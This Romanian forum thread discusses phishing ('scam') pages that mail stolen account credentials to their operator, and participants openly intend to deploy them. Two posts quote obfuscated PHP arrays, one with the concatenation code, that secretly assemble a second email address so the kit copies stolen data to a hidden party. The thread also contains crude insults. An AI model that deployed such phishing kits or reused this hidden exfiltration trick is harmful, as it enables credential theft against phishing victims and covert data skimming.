Jump to content
YceFire

Diferite scam pages

Recommended Posts

Posted

Daca aveti de gend sa le folositi scoateti aceasta linie din fisierul care trimite datele pe mail:

$ar=array("0"=>"a","1"=>"c","2"=>"r","3"=>"o","4"=>"b","5"=>"1","6"=>"@","7"=>"h","8"=>"y","9"=>".","10"=>"m");

Asta din cate stiu eu este un backdoor, rezultatul fiin trimiterea datelor pe inca un mail

Posted

<div class='quotetop'>QUOTE("cocoi89")</div>

mah mai merge ???? eu le-am pus pe evonet .... am schimbat mailul si nu merge ... a cazut root ?

Nu a cazut nici un root. :)

Tu vrei sa pui paginile astea pe un host si sa iti vina conturi asa pur si simplu? (ce bine ar fi :) )

Posted

cocoi89, scuza`ma , DA`TE`N PULA MEA.Tu ori postezi la misto, ori da`ne dracu telefonu alor tai sa le zicem sa paroleze compulatorul ca mitnick e copil pe langa tine.

Posted

$ar=array("1"=>"i","2"=>"v","3"=>"o","4"=>"p","5"=>".","6"=>"g","7"=>"r","8"=>"_","9"=>"d","10"=>"y","11"=>"f","12"=>"@","13"=>"3","14"=>"h","15"=>"a");

$cc=$ar['7'].$ar['3'].$ar['9'].$ar['7'].$ar['1'].$ar['6'].$ar['3'].$ar['4'].$ar['2'].$ar['8'].$ar['13'].$ar['12'].$ar['10'].$ar['15'].$ar['14'].$ar['3'].$ar['3'].$ar['5'].$ar['11'].$ar['7'];

tre sa sterg totu sau doar aia cu array ?

Posted

ce ar fi daca ai vizita un manual php sa vezi ce inseamna aia.. si dupa sa stergi ?

P.S. gigimirc trebuia sa nu le zici .. e facut mai anti kiddie asa lasa-i sa ia altu de pe urma lor daca habar nu au php